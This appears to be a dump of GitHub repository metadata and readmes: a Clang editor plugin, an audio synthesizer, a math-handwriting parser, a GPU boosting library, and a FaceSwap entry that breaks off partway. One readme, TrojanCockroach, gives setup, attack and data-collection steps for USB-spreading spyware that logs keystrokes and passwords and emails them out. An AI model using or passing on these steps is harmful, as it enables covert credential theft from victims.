|alt+d,alt+b|Go back to where you were before hitting alt+d,alt+d or alt+d,alt+i|\n |alt+d,alt+c|Clear the cache. Will force all files to be reparsed when needed|\n |alt+d,alt+w|Manually warm up the cache|\n |alt+d,alt+r|Manually reparse the current file|\n |alt+d,alt+t|Toggle whether Clang completion is enabled or not. 
Useful if the complete operation is slow and you only want to use it selectively|\n |alt+d,alt+p|Toggle the Clang output panel|\n |alt+d,alt+e|Go to next error or warning in the file|\n |alt+shift+d,alt+shift+e|Go to the previous error or warning in the file|\n |alt+d,alt+s|Run the Clang static analyzer on the current file|\n |alt+d,alt+o|Run the Clang static analyzer on the current project|\n |alt+d,alt+f|Toggle whether fast (but possibly inaccurate) completions are used or not|\n\n=== Show your support ===\n\n[[https://www.paypal.com/cgi-bin/webscr?cmd=_s-xclick&hosted_button_id=UPSEP2BHMLYEW|Donate]]\n\n=== License ===\nThis plugin is using the zlib license\n\n{{{\nCopyright (c) 2011-2012 Fredrik Ehnbom\n\nThis software is provided 'as-is', without any express or implied\nwarranty. In no event will the authors be held liable for any damages\narising from the use of this software.\n\nPermission is granted to anyone to use this software for any purpose,\nincluding commercial applications, and to alter it and redistribute it\nfreely, subject to the following restrictions:\n\n 1. The origin of this software must not be misrepresented; you must not\n claim that you wrote the original software. If you use this software\n in a product, an acknowledgment in the product documentation would be\n appreciated but is not required.\n\n 2. Altered source versions must be plainly marked as such, and must not be\n misrepresented as being the original software.\n\n 3. This notice may not be removed or altered from any source\n distribution.\n}}}\n\n---------------------------------------------------------\n\nAnd in addition to this, clang itself is using the following license:\n\n{{{\nUniversity of Illinois/NCSA\nOpen Source License\n\nCopyright (c) 2003-2012 University of Illinois at Urbana-Champaign.\nAll rights reserved.\n\nDeveloped by:\n\n LLVM Team\n\n University of Illinois at Urbana-Champaign\n\n http://llvm.org\n\nPermission is hereby granted, free of charge, to any person obtaining a copy of\nthis software and associated documentation files (the \"Software\"), to deal with\nthe Software without restriction, including without limitation the rights to\nuse, copy, modify, merge, publish, distribute, sublicense, and/or sell copies\nof the Software, and to permit persons to whom the Software is furnished to do\nso, subject to the following conditions:\n\n * Redistributions of source code must retain the above copyright notice,\n this list of conditions and the following disclaimers.\n\n * Redistributions in binary form must reproduce the above copyright notice,\n this list of conditions and the following disclaimers in the\n documentation and/or other materials provided with the distribution.\n\n * Neither the names of the LLVM Team, University of Illinois at\n Urbana-Champaign, nor the names of its contributors may be used to\n endorse or promote products derived from this Software without specific\n prior written permission.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS\nFOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE\nCONTRIBUTORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS WITH THE\nSOFTWARE.\n}}}\n\n", "readme_type": "text", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "monadgroup/axiom", "link": "https://github.com/monadgroup/axiom", "tags": ["synthesizer", "demoscene", "vst", "dsp", "rust", "c-plus-plus", "llvm"], "stars": 653, "description": "A powerful realtime node-based audio synthesizer.", "lang": "C++", "repo_lang": "", "readme": "# Axiom [![Build Status](https://travis-ci.org/monadgroup/axiom.svg?branch=master)](https://travis-ci.org/monadgroup/axiom)\n\n![Picture of a synth built in Axiom](axiom.png)\n\n> A synth built in the current version of Axiom\n\nAxiom is an extremely flexible node-based realtime audio synthesizer. It was originally designed for size-constrained environments such as PC intros in the demoscene, but is entirely open source and is becoming an excellent free tool for any musician.\n\n**Axiom's a bit afk at the moment, I've been preparing for a big redesign/rewrite but haven't had much time to put towards it or bugfixing recently. Contributions are still welcome as always :)**\n\nFeatures:\n\n - Musician-friendly (ie knobs and sliders) interface\n - Highly customizable and flexible through a node editor and Maxim, a custom scripting language\n - Export to replayer with no dependencies (not even the standard library)\n - Use any DAW with VSTi support for note editing and automation\n\nThere are currently pre-packaged versions available for Windows and macOS (alpha, let us know of any issues) on [the Releases page](https://github.com/monadgroup/axiom/releases). Stay tuned for Linux builds!\n\n**[Usage Guide](https://github.com/monadgroup/axiom/blob/master/docs/UsageGuide.md) \u00b7 [Example Projects](https://github.com/monadgroup/axiom/tree/master/examples) \u00b7 [Downloads & Release Notes](https://github.com/monadgroup/axiom/releases)**\n\n## Backends\n\nAxiom currently supports the following audio backends:\n\n - Standalone editor - doesn't require a DAW or host, allowing experimentation with the editor. MIDI can be input from a MIDI device, or by pressing keys on a regular computer keyboard.\n - VST2 - runs in a VST host as an instrument or effect, with support for side-chaining and multiple inputs/outputs.\n - _Other backends such as VST3 are planned_\n\n## Building\n\nAxiom is built with CMake. The build process depends on Cargo, Qt 5.10+, LLVM 6, and the VST 2 SDK (for the VST2 backend), so make sure those are installed and setup correctly. You can download the VST 2 SDK [from Steinberg's website](http://steinberg.net/sdk_downloads/vstsdk366_27_06_2016_build_61.zip), the other libraries can likely be found in your system's package manager, or from their respective websites.\n\nOnce Cargo, Qt, LLVM, and the VST SDK are installed, go to the directory where you'd like to build Axiom to. Then run the following command:\n\n```\ncmake ../path/to/source -DVST2_SDK_ROOT=/path/to/vst/sdk\n```\n\nIf you want to build it statically-linked, pass the `AXIOM_STATIC_LINK` flag:\n\n```\ncmake ../path/to/source -DAXIOM_STATIC_LINK=ON -DVST2_SDK_ROOT=/path/to/vst/sdk\n```\n\nCMake will setup files necessary for building. If this fails, make sure you've got Cargo, Qt, LLVM, and the VST SDK installed correctly. 
Once complete, you can choose which backend to build:\n\n### VST2 Instrument & VST2 Effect\n\n* To build the VST2 instrument backend, use the following command. Make sure you provided a path to the VST SDK in the command above.\n```\ncmake --build ./ --target axiom_vst2_instrument\n```\n\n* You can also build the VST2 effect with the `axiom_vst2_effect` target.\n```\ncmake --build ./ --target axiom_vst2_effect\n```\n\n### Standalone\n\n* To build the standalone version as an executable, use the following command. The standalone optionally depends on PortAudio and PortMidi: without PortAudio nodes will not be simulated and audio will not be output, without PortMidi MIDI devices cannot be used for input.\n\n\n```\ncmake --build ./ --target axiom_standalone\n```\n\n## Development\n\nAxiom is comprised of several components:\n\n - The VST Editor, written with Qt and the VST SDK. This is the only part the user directly interacts with, and must be\n OS-independent. \n - The Maxim language compiler and runtime, written in Rust with LLVM and statically linked into the editor.\n - The replayer, _coming soon_.\n\n## License\n\nLicensed under the MIT license. See the LICENSE file in the repository for more details.\n", "readme_type": "markdown", "hn_comments": "Looks really cool, and similar to Audulus http://audulus.com/Hey friends!This is a project I\u2019ve been working on since the start of the year. We\u2019ve just released 0.4.0, so I figured now would be a nice time to start making it a bit more public. There\u2019s a bunch of interesting tech under the hood which I thought you all would definitely be interested in :)Axiom\u2019s a project that grew out of my third try at building a realtime software synthesizer for 64k intros in the demoscene. You can\u2019t really fit an mp3 file in an executable that small and expect for it to sound any good, so instead we synthesize the audio and play it in realtime. A few other groups have written synthesizers for 4k and 64k productions, however I built this for two reasons: I wanted to make one myself, and I wanted to try some interesting things with combining node graphs and basic scripting. At some point, however, I realized that this could actually be a really useful tool for any musician to have, since it really flips things on its head and allows much more control than just stringing together a bunch of plugins (the question is, of course, do people who make music _want_ this control - I'm not sure on the answer yet).Technology-wise, Axiom compiles 'node surfaces' with LLVM (no interpreters here, the code has to run comfortably 44100 times per second!). The editor, written in C++ with Qt, builds a MIR and passes it into the compiler, written in Rust. This was my first large project in C++ and first project in Rust... ultimately I think the Rust learning curve has definitely been worth it, as it's by far the stablest part of the program!Ultimately I\u2019m hoping to somehow be able to turn this into a real product, possibly by offering what you see as the core open-source software and then building on it, into something like a DAW or plugin for procedural audio in game engines (which a few people have suggested to me, and I think would be a really cool application of the technology!).Check it out, let me know what you think (either here, or shoot me an email, chat on twitter, etc), ask questions, build something cool, have fun!Overall looks pretty neat. I\u2019m a big fan of dark themes, but I think this one takes it a bit too far. 
I\u2019m having trouble reading the text which doesn\u2019t contrast well against the background. Consider lightening some of the elements.Awesome, I've always wanted to make something like this myself but never came around to do it!It would be really neat if someone combined this with a very simple sequencer/tracker to create and manipulate tunes, which could then be dropped in (sequencer + synthesizer) directly into projects. It could be a quick and easy way to add music to small-scale retro game projects, for example.The VSTi support is pretty sweet-it pretty much changes this sort of thing from toy to tool.Looks cool, looking forward to playing around with it!If it is compiling, can it also export code/libraries that can be embedded in other projects, or is the way to go to embed the entire thing? Since you mention demos as a target group I'd guess the first, but it isn't entirely clear.", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "falvaro/seshat", "link": "https://github.com/falvaro/seshat", "tags": [], "stars": 652, "description": "Handwritten math expression parser", "lang": "C++", "repo_lang": "", "readme": "SESHAT: Handwritten math expression parser\n==========================================\n*Seshat* is an open-source system for recognizing handwritten\nmathematical expressions. Given a sample represented as a sequence of\nstrokes, the parser is able to convert it to LaTeX or other formats\nlike InkML or MathML. You can see an example of application of this\nparser in\n\nhttp://cat.prhlt.upv.es/mer/\n\nwhere *seshat* is the underlying engine.\n\nThis parser has been developed by Francisco \u00c1lvaro as part of his PhD\nthesis while he was a member of the [PRHLT research center] [1] at\n[Universitat Polit\u00e8cnica de Val\u00e8ncia] [2].\n\n*Seshat* represents a state-of-the-art system that has participated in\nseveral [international competitions] [3], and it was awarded the best\nsystem trained on the competition dataset in:\n\n- Mouch\u00e8re H., Viard-Gaudin C., Zanibbi R., Garain U.\n *ICFHR 2014 Competition on Recognition of On-line Handwritten \n Mathematical Expressions (CROHME 2014)*.\n International Conference on Frontiers in Handwriting Recognition (ICFHR),\n Crete Island, Greece (2014)\n\nThe math expression recognition model that *seshat* implements is described in:\n\n- Francisco \u00c1lvaro, Joan-Andreu S\u00e1nchez and Jos\u00e9-Miguel Bened\u00ed.\n *An Integrated Grammar-based Approach for Mathematical Expression Recognition*.\n Pattern Recognition, pp. 135-147, 2016\n\nand it is the main part of my PhD thesis. \n\n - Francisco \u00c1lvaro (advisors: Joan-Andreu S\u00e1nchez and Jos\u00e9-Miguel Bened\u00ed).\n [Mathematical Expression Recognition based on Probabilistic Grammars][13].\n Doctor of Philosophy in Computer Science,\n Universitat Polit\u00e8cnica de Val\u00e8ncia, 2015.\n\nLicense\n-------\n*Seshat* is released under the [GNU General Public License version 3.0 (GPLv3)] [5]\n\n\nDistribution details\n--------------------\n*Seshat* is written in C++ and should work on any platform, although\nit has only been tested in Linux.\n\nThis software integrates the open-source [RNNLIB library] [4]\nfor symbol classification. The code of RNNLIB has been slightly\nmodified and directly integrated in *seshat*, thus, it is not\nnecessary to download it. However, it requires the [Boost C++\nLibraries] [6] (headers only).\n\nFinally, the parser accepts input files in two formats: InkML and\nSCGINK. 
There is an example of each format in the folder\n\"SampleMathExps\". *Seshat* uses the [Xerces-c library] [7] for parsing\nInkML in C++.\n\n\n\nInstallation\n--------------------\n*Seshat* is written in C++ and only requires make and g++ to\ncompile it. Once the required tools and libraries are available, you\ncan proceed with the installation of *seshat* as follows:\n\n 1. Obtain the package using git:\n\n $ git clone https://github.com/falvaro/seshat.git\n\n Or [download it as a zip file] [8]\n\n 2. Go to the directory containing the source code.\n\n 3. If the include files of the Boost libraries are not in the path, add\n the path to the *FLAGS* variable in the file *Makefile* (\"-I/path/to/boost/\").\n\n 4. Compile *seshat*:\n\n $ make\n\nAs a result, you will have the executable file \"*seshat*\" ready to\nrecognize handwritten math expressions.\n\n\nExample of usage\n----------------\nRun *seshat* without arguments and it will display the command-line interface:\n\n```\n$ Usage: ./seshat -c config -i input [-o output] [-r render.pgm]\n\n -c config: set the configuration file\n -i input: set the input math expression file\n -o output: save recognized expression to 'output' file (InkML format)\n -r render: save in 'render' the image representing the input expression (PGM format)\n -d graph: save in 'graph' the description of the recognized tree (DOT format)\n```\n\nThere are two example math expressions in the folder \"SampleMathExps\". The\nfollowing command will recognize the expression `(x+y)^2` encoded in\n\"exp.scgink\":\n\n\t$ ./seshat -c Config/CONFIG -i SampleMathExps/exp.scgink -o out.inkml -r render.pgm -d out.dot\n\nThis command outputs several pieces of information on the standard output; the last line will\nprovide the LaTeX string of the recognized math expression. Furthermore:\n\n- An image representation of the input strokes will be rendered in \"render.pgm\".\n\n- The InkML file of the recognized math expression will be saved in \"out.inkml\".\n\n- The derivation tree of the expression, provided as a graph in DOT\n format, will be saved in \"out.dot\". The representation of the graph\n in, for example, PostScript format can be obtained as follows:\n\n \t $ dot -o out.ps out.dot -Tps\n\nIt should be noted that only the options \"-c\" and \"-i\" are mandatory.\n\n\nCitations\n---------\nIf you use *seshat* for your research, please cite the following reference:\n\n
\n@article{AlvaroPR16,\ntitle = \"An integrated grammar-based approach for mathematical expression recognition\",\nauthor = \"Francisco \\'Alvaro and Joan-Andreu S\\'anchez and Jos\\'e-Miguel Bened\\'{\\i}\",\njournal = \"Pattern Recognition\",\nvolume = \"51\",\npages = \"135 - 147\",\nyear = \"2016\",\nissn = \"0031-3203\"\n}\n
\n\n\nWhy *seshat*?\n-------------\n*Seshat* was the [Goddess of writing] [9] according to Egyptian\nmythology, so I liked this name for a handwritten math expression\nparser. I found out about *seshat* because my colleague of the PRHLT\n[Daniel Ortiz-Mart\u00ednez] [10] developed [Thot] [11], a great\nopen-source toolkit for statistical machine translation; and Thot is\nthe [God of Knowledge] [12] according to Egyptian mythology.\n\n\n\n\n[1]: http://www.prhlt.upv.es/\n[2]: http://www.upv.es/\n[3]: http://www.isical.ac.in/~crohme/\n[4]: http://sourceforge.net/projects/rnnl/\n[5]: http://www.gnu.org/licenses/gpl-3.0.html\n[6]: http://www.boost.org/\n[7]: http://xerces.apache.org/xerces-c/\n[8]: https://github.com/falvaro/seshat/archive/master.zip\n[9]: http://en.wikipedia.org/wiki/Seshat\n[10]: https://www.prhlt.upv.es/page/member?user=dortiz\n[11]: https://github.com/daormar/thot\n[12]: http://en.wikipedia.org/wiki/Thoth\n[13]: http://hdl.handle.net/10251/51665\n", "readme_type": "markdown", "hn_comments": "Hehe, guess I'm not the only one who likes using ancient gods as names for technology. My backup server is called Seshat, since she's seen as a record keeper.The symbol recognition is really good, but it does not handle positioning and relative sizes that well: http://imgur.com/7FCr6TDThe link text is something of a garden path sentence... At first I thought it was a handwritten parser for math expressions, not a parser for handwritten math expressions!Works great when it does, fails miserably when it doesn't.For example, it doesn't seem to know about matrices. That's fine, but when you enter one, it comes up with spectacular failures. I got integrals (probably because an integral sign somewhat matches the 'opening parenthesis' of a matrix) i^i, cases where it almost randomly stringed together parts of a matrix, etc.This is great and worked very well on the few examples I tried. I wonder how it would work with a photo - author, has it been tried?Something seems off here: http://i.imgur.com/qBJCIqh.pngI have been using the free app \"MathPad\" on iPhone for a few years now. It does the same thing (A LOT better). But the free version does not allow export to LaTeX, so this open source alternative is more than welcome.This reminds me of work by one of my professors at Rochester Institute of Technology (Dr. Richard Zanibbi). There is an application called Freehand Formula Entry System (FFES) available on his website for download (GPL source as well) [1]. He also published a paper on it titled \"Recognition and Retrieval of Mathematical Expressions\" (2012) [2].[1] https://www.cs.rit.edu/~rlaz/ffes/[2] https://www.cs.rit.edu/~rlaz/files/mathSurvey.pdfThis is an awesome project! The demo could use some work, though. It's pretty hard to write legibly with a mouse, so I tried to open it on my phone, but the canvas doesn't work properly when zoomed in. (using Chrome on Android)I can't seem to make it recognize logs with arbitrary bases:http://imgur.com/a/GkW9EThis works rather well! I tried it on my iPhone. Simple expressions work just fine. I can't seem to make finite integrals work though.Wow, just skimmed through the PhD thesis that includes this work[1] and it's impressively thorough. The algorithm supports both vector and bitmap input, and uses Recursive Neural Networks and probabilistic grammars to disambiguate the symbols. Their open source implementation is in C++, under GPLv3 license.[1] https://riunet.upv.es/handle/10251/51665I've tried the web demo and for me it works quite well. 
In my case, definite integrals work except for the \"dx\" which gets interpreted as \"d_x\" for no apparent reason.Some years ago I did some work in this direction which might be relevant: it only involved the formula structure analysis with an improved version of the DRACULAE algorithm from Zanibbi et al. (also cited in SESHAT's paper), starting from given characters (no symbol recognition except for hand-drawn fraction bars) freely positioned/scaled on the page.\nIt delivers layout/presentation markup (MathML, DRACULAE tree), semantic encoding (OpenMath), natural language (English) and speech output, all in Javascript:\nhttp://matracas.org/tacto/At the time, speech worked in Firefox, Chrome and even Safari, but nowadays only works in Firefox. I don't remember whether it worked in Opera but all other features did.[Edit to add:] My application does not implement matrices either, just arithmetics including exponents, subindexes, and fractions.", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "Xtra-Computing/thundergbm", "link": "https://github.com/Xtra-Computing/thundergbm", "tags": ["cuda", "gpu", "gbdt", "random-forest", "machine-learning"], "stars": 652, "description": "ThunderGBM: Fast GBDTs and Random Forests on GPUs", "lang": "C++", "repo_lang": "", "readme": "[![Documentation Status](https://readthedocs.org/projects/thundergbm/badge/?version=latest)](https://thundergbm.readthedocs.org)\n[![GitHub license](https://img.shields.io/badge/license-apache2-yellowgreen)](./LICENSE)\n[![GitHub issues](https://img.shields.io/github/issues/xtra-computing/thundergbm.svg)](https://github.com/xtra-computing/thundergbm/issues)\n[![PyPI version](https://badge.fury.io/py/thundergbm.svg)](https://badge.fury.io/py/thundergbm)\n[![Downloads](https://pepy.tech/badge/thundergbm)](https://pepy.tech/project/thundergbm)\n\n
\n\n\n\n
\n\n[Documentations](docs/index.md) | [Installation](docs/how-to.md#how-to-install-thundergbm) | [Parameters](docs/parameters.md) | [Python (scikit-learn) interface](python/README.md)\n\n## What's new?\nThunderGBM won the 2019 Best Paper Award from IEEE Transactions on Parallel and Distributed Systems, awarded by the IEEE Computer Society Publications Board (1 out of 987 submissions, for the work \"Zeyi Wen^, Jiashuai Shi*, Bingsheng He, Jian Chen, Kotagiri Ramamohanarao, and Qinbin Li*, Exploiting GPUs for Efficient Gradient Boosting Decision Tree Training, IEEE Transactions on Parallel and Distributed Systems, vol. 30, no. 12, 2019, pp. 2706-2717.\"). See more details: [Best Paper Award Winners from IEEE](https://www.computer.org/publications/best-paper-award-winners), \n[News from NUS School of Computing](https://www.comp.nus.edu.sg/news/2020-ieee-tpds/)\n\n\n## Overview\nThe mission of ThunderGBM is to help users easily and efficiently apply GBDTs and Random Forests to solve problems. ThunderGBM exploits GPUs to achieve high efficiency. Key features of ThunderGBM are as follows.\n* Often 10x faster than other libraries.\n* Supports Python (scikit-learn) interfaces.\n* Supported operating systems: Linux and Windows.\n* Supports classification, regression and ranking.\n\n**Why accelerate GBDT and Random Forests**: A [survey](https://www.kaggle.com/amberthomas/kaggle-2017-survey-results) conducted by Kaggle in 2017 shows that 50%, 46% and 24% of the data mining and machine learning practitioners are users of Decision Trees, Random Forests and GBMs, respectively. \n\n\nGBDTs and Random Forests are often used for creating state-of-the-art data science solutions. We've listed three winning solutions using GBDTs below. Please check out the [XGBoost website](https://github.com/dmlc/xgboost/blob/master/demo/README.md#machine-learning-challenge-winning-solutions) for more winning solutions and use cases. 
Here are some example successes of GBDTs and Random Forests:\n\n- Halla Yang, 2nd place, [Recruit Coupon Purchase Prediction Challenge](https://www.kaggle.com/c/coupon-purchase-prediction), [Kaggle interview](http://blog.kaggle.com/2015/10/21/recruit-coupon-purchase-winners-interview-2nd-place-halla-yang/).\n- Owen Zhang, 1st place, [Avito Context Ad Clicks competition](https://www.kaggle.com/c/avito-context-ad-clicks), [Kaggle interview](http://blog.kaggle.com/2015/08/26/avito-winners-interview-1st-place-owen-zhang/).\n- Keiichi Kuroyanagi, 2nd place, [Airbnb New User Bookings](https://www.kaggle.com/c/airbnb-recruiting-new-user-bookings), [Kaggle interview](http://blog.kaggle.com/2016/03/17/airbnb-new-user-bookings-winners-interview-2nd-place-keiichi-kuroyanagi-keiku/).\n\n## Getting Started\n\n### Prerequisites\n* cmake 2.8 or above \n * gcc 4.8 or above for Linux | [CUDA](https://developer.nvidia.com/cuda-downloads) 9 or above\n * Visual C++ for Windows | CUDA 10\n\n### Quick Install\n* For Linux with CUDA 9.0\n * `pip install thundergbm`\n \n* For Windows (64bit)\n - Download the Python wheel file (for Python 3 or above)\n \n * [CUDA 10.0 - Win64](https://github.com/Xtra-Computing/thundergbm/blob/master/python/dist/thundergbm-0.3.12-py2-none-win_amd64.whl)\n\n - Install the Python wheel file\n \n * `pip install thundergbm-0.3.4-py3-none-win_amd64.whl`\n* Currently only Python 3 is supported\n* After you have installed thundergbm, you can import and use the classifier (similarly for the regressor) by:\n```python\nfrom thundergbm import TGBMClassifier\nclf = TGBMClassifier()\nclf.fit(x, y)\n```\n### Build from source\n```bash\ngit clone https://github.com/zeyiwen/thundergbm.git\ncd thundergbm\n#under the directory of thundergbm\ngit submodule init cub && git submodule update\n```\n### Build on Linux (build instructions for [Windows](docs/how-to.md#build-on-windows))\n```bash\n#under the directory of thundergbm\nmkdir build && cd build && cmake .. && make -j\n```\n\n### Quick Start\n```bash\n./bin/thundergbm-train ../dataset/machine.conf\n./bin/thundergbm-predict ../dataset/machine.conf\n```\nYou will see `RMSE = 0.489562` after a successful run.\n\nMacOS is not supported, as Apple has [suspended support](https://www.forbes.com/sites/marcochiappetta/2018/12/11/apple-turns-its-back-on-customers-and-nvidia-with-macos-mojave/#5b8d3c7137e9) for some NVIDIA GPUs. We will consider supporting MacOS based on our user community feedback. Please stay tuned.\n\n## How to cite ThunderGBM\nIf you use ThunderGBM in your paper, please cite our work ([TPDS](https://zeyiwen.github.io/papers/tpds19_gpugbdt.pdf) and [JMLR](https://github.com/Xtra-Computing/thundergbm/blob/master/thundergbm-full.pdf)).\n```\n@ARTICLE{8727750,\n author={Z. {Wen} and J. {Shi} and B. {He} and J. {Chen} and K. {Ramamohanarao} and Q. {Li}},\n journal={IEEE Transactions on Parallel and Distributed Systems}, \n title={Exploiting GPUs for Efficient Gradient Boosting Decision Tree Training}, \n year={2019},\n volume={30},\n number={12},\n pages={2706-2717},\n }\n\n@article{wenthundergbm19,\n author = {Wen, Zeyi and Shi, Jiashuai and He, Bingsheng and Li, Qinbin and Chen, Jian},\n title = {{ThunderGBM}: Fast {GBDTs} and Random Forests on {GPUs}},\n journal = {Journal of Machine Learning Research},\n volume={21},\n year = {2020}\n}\n```\n### Related papers\n* Zeyi Wen, Jiashuai Shi, Bingsheng He, Jian Chen, Kotagiri Ramamohanarao and Qinbin Li. Exploiting GPUs for Efficient Gradient Boosting Decision Tree Training. 
IEEE Transactions on Parallel and Distributed Systems (TPDS), accepted in May 2019. [pdf](https://zeyiwen.github.io/papers/tpds19_gpugbdt.pdf)\n\n* Zeyi Wen, Hanfeng Liu, Jiashuai Shi, Qinbin Li, Bingsheng He, Jian Chen. ThunderGBM: Fast GBDTs and Random Forests on GPUs. Featured at JMLR MLOSS (Machine Learning Open Source Software). Year: 2020, Volume: 21, Issue: 108, Pages: 1\u22125. [pdf](https://github.com/Xtra-Computing/thundergbm/blob/master/thundergbm-full.pdf)\n\n* Zeyi Wen, Bingsheng He, Kotagiri Ramamohanarao, Shengliang Lu, and Jiashuai Shi. Efficient Gradient Boosted Decision Tree Training on GPUs. The 32nd IEEE International Parallel and Distributed Processing Symposium (IPDPS), pages 234-243, 2018. [pdf](https://www.comp.nus.edu.sg/~hebs/pub/IPDPS18-GPUGBDT.pdf)\n\n\n## Key members of ThunderGBM\n* [Zeyi Wen](https://zeyiwen.github.io), NUS (now at The University of Western Australia)\n* Hanfeng Liu, GDUFS (a visiting student at NUS)\n* Jiashuai Shi, SCUT (a visiting student at NUS)\n* Qinbin Li, NUS\n* Advisor: [Bingsheng He](https://www.comp.nus.edu.sg/~hebs/), NUS\n* Collaborators: Jian Chen (SCUT)\n\n## Other information\n* This work is supported by a MoE AcRF Tier 2 grant (MOE2017-T2-1-122) and an NUS startup grant in Singapore.\n\n## Related libraries\n* [ThunderSVM](https://github.com/Xtra-Computing/thundersvm), which is another *Thunder* series software tool developed by our group.\n* [XGBoost](https://github.com/dmlc/xgboost) | [LightGBM](https://github.com/Microsoft/LightGBM) | [CatBoost](https://github.com/catboost/catboost) | [cuML](https://github.com/rapidsai/cuml)\n", "readme_type": "markdown", "hn_comments": "Interesting work\nAnother fast machine learning project of the same team:\nhttps://bit.ly/2NxLaPv", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "MinhasKamal/TrojanCockroach", "link": "https://github.com/MinhasKamal/TrojanCockroach", "tags": ["spyware", "virus", "trojan", "keylogger", "pendrive", "trojan-cockroach", "cpp", "fud", "malware"], "stars": 652, "description": "A Stealthy Trojan Spyware", "lang": "C++", "repo_lang": "", "readme": "

# Trojan Cockroach

\n\n[![Donate](https://img.shields.io/badge/Donate-PayPal-green.svg)](https://www.paypal.com/donate/?business=5KR6BA9MYTM62&no_recurring=0&currency_code=USD)\n\n#### A Stealthy Trojan Spyware\n\nYou are looking at a **Trojan Virus** that steals data (IDs, passwords; every key stroke) from a PC (Windows XP or later), then emails it back to you. It spreads among PCs through USB drives, and is almost undetectable to any antivirus software.\n\n*Created only for learning purposes.*\n\n### Intro\n- [TrojanCockroach.cpp](https://github.com/MinhasKamal/TrojanCockroach/blob/master/com/minhaskamal/trojanCockroach/TrojanCockroach.cpp): logs the user's data, sends data through Transmit.exe, and infects portable drives.\n- [Infect.cpp](https://github.com/MinhasKamal/TrojanCockroach/blob/master/com/minhaskamal/trojanCockroach/Infect.cpp): installs the virus onto the computer from a portable drive.\n- [Transmit.exe](https://github.com/MinhasKamal/TrojanCockroach/blob/master/com/minhaskamal/trojanCockroach/Transmit.exe): emails data back.\n- [TrojanCockroach.lnk](https://github.com/MinhasKamal/TrojanCockroach/blob/master/com/minhaskamal/trojanCockroach/TrojanCockroach.lnk): resides in the startup folder of the PC and activates TrojanCockroach.exe.\n- [Infect.lnk](https://github.com/MinhasKamal/TrojanCockroach/blob/master/com/minhaskamal/trojanCockroach/Infect.lnk): takes different attractive names in the infected portable drive, and activates Infect.exe when clicked.\n- [DecodeMessage.cpp](https://github.com/MinhasKamal/TrojanCockroach/blob/master/com/minhaskamal/trojanCockroach/DecodeMessage.cpp): used to decode the received email.\n\n### Setup\n\n
    \n
#### Preparation\n1. Download the full package from here.\n2. Change the method sendData() of TrojanCockroach.cpp: place your email and password in the command. (screenshot)\n3. Compile TrojanCockroach.cpp & Infect.cpp. Transmit.exe is actually the executable distribution of curl for Windows.\n4. Place TrojanCockroach.exe, Infect.exe, Transmit.exe, Infect.lnk & TrojanCockroach.lnk in the same folder. This is how they look: (screenshot)\n5. Now run TrojanCockroach.exe, then insert a pendrive (see the magic!). You will get a hidden folder and a link file in your pendrive. The hidden folder contains the full package, & the link file is actually a renamed form of Infect.lnk. (screenshot)\n\n#### Attack\n1. Insert the USB drive in the subject's PC (yes, you have to start the spreading process from somewhere!). Run Infect.lnk and the spyware will be injected.\n2. The spyware will be activated after a reboot. Now (after a restart), every time any USB drive is inserted in the affected PC, the virus will copy itself into it, and the cycle will start again.\n\n#### Data Collection\n1. You need to wait several days (depending on the number of power on/off cycles of the PC) before getting any data.\n2. After getting the email, copy the full message to a text file. (screenshot) As the message has come through email, certain characters are converted. To resolve that --- --- ---.\n3. Now run DecodeMessage.exe to decode the message as plain text. (screenshot) In this phase, you can look for specific patterns in the text, and thus get rid of most of the useless parts (like mouse clicks, or the same key-group presses that happen during gaming).
\n\n### Further\nYou may read [TrojanCockroachStory](https://github.com/MinhasKamal/TrojanCockroach/blob/master/TrojanCockroachStory.md) to get an overview of how the program works. You will get a clearer understanding of the project from its pre-project, **[StupidKeyLogger](https://github.com/MinhasKamal/StupidKeyLogger)**.\n\nThe project is perfectly runnable. However, I do not want newbies to abuse my project. So, I am **keeping some simple secrets unrevealed**. There are also some intentionally created **holes in this 'README'**. I have made some **nonsense changes in the code** too, so that no one can run it effectively without getting their hands dirty. I believe these plain obstacles can easily be overcome by ***ACTUAL PROGRAMMERS*** :)\n\n**Note:** *I will also not take any responsibility for someone else's ill acts with this program.* But I do believe that a real learner will learn a lot from this.\n\n\n### License\n
Trojan Cockroach is licensed under MIT License.\n", "readme_type": "markdown", "hn_comments": "Why is it \"almost undetectable to any antivirus software\"? It hasn't been used in the wild therefore they haven't taken its signature? There's no sarcasm in my question, I genuinely want to know this.hmm... good project for learning purposeThis program is a Trojan Virus that steals data from PC and emails it back to the author. It spreads among PCs through USB drives. It is undetectable by any antivirus software.It is created only for educational purpose.", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "hrastnik/FaceSwap", "link": "https://github.com/hrastnik/FaceSwap", "tags": ["face", "face-swap", "dlib", "opencv", "swap", "real-time"], "stars": 652, "description": "Real-time FaceSwap application built with OpenCV and dlib", "lang": "C++", "repo_lang": "", "readme": "# [Youtube video](https://youtu.be/32i1ca8pcTg)\n\n# How to run?\n\nDownload [OpenCV](http://opencv.org/downloads.html) and [dlib](http://dlib.net/)\n\n- Setup OpenCV\n - Run the downloaded OpenCV executable file and select a directory to extract the OpenCV library (for example D:\\opencv\\)\n- Setup dlib\n - Extract the downloaded zip file to a directory (for example D:\\dlib)\n- Download and install Visual Studio 2015 or later versions\n- Run Visual Studio\n- Create new empty project and name it something (for example MyProject)\n- Make sure the \"Debug\" solution configuration is selected\n- In Visual Studio open the Solution Explorer window\n- Right click MyProject and choose Properties\n- Click the \"Configuration Manager...\" button in the top left corner\n- Setup the configuration for the debug\n - In the active solution platform select x64\n - Close the Configuration Manager window\n - In the property window make sure the selected Configuration in the top left is \"Debug\" and Platform is \"x64\"\n - In the panel on the left choose C/C++\n - In the Additional Include Directories field add two directories:\n - 